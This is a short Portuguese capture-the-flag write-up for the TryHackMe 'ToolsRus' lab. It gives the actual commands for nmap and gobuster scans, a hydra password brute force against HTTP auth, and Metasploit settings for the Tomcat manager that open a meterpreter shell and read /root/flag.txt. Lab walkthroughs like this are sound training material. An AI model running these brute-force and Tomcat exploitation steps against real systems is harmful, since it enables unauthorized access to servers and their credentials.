ToolsRus CTF

Alooow!

Este é o meu primeiro roteiro do THM e o desafio foi o ToolsRus Vou compartilhar o meu caminho..

alt text

Usei as seguintes ferramentas 
-dirbuster
-hydra
-nmap
-nikto
-metasploit

Identificando portas!

nmap

nmap -sV $IP alt text

Gobuster

Identificamos um servidor apache na porta 80 e curiosamente um Tomcat na porta 1234 Aplicamos o gobuster gobuster dir -u http://10.10.139.47/ -w /usr/share/dirb/wordlists/common.txt

alt text

No diretório /guidelines encontramos o nome bob

alt text

Na porta 1234 encontramos o Tomcat como esperado

alt text

No diretório /protected identificamos a requisição de login e senha

alt text

Ja que identifiquei a porta 1234 vamos rodar um gobuster pra identificar novos diretórios

Gobuster

gobuster dir -u http://10.10.139.47:1234/ -w /usr/share/dirb/wordlists/common.txt

alt text

Com a página de login encontrada vamos tentar quebrar a senha com o hydra usando o usuário bob que identificamos mais acima

Hydra

hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.139.47 http-get /protected

alt text

Aqui encontramos login e senha Com essas credenciais conseguimos autenticar no Tomcat manager

alt text

Essas credenciais não são suficientes ainda para logar via SSH.

Nikto

nikto -id bob:bubbles -h http://10.10.139.47:1234/manager/ alt text Nos traz algumas paginas para analisar..

Com um possivel usuario bob e uma tela de login podemos fazer uma forcinha bruta e tentar descobrir a senha...

Bora metasploit

-set RHOST $IPDESTINO
-set RPORT 1234
-set httpusername bob
-set httppasword *****
-run

alt text

Sucesso!

O meterpreter nos dar poder para enviar comandos para a máquina

alt text Dentro de /root/ conseguimos ler a flag.txt cat /root/flag.txt

alt text

Com a flag e root finalizo esta sala!

[]`s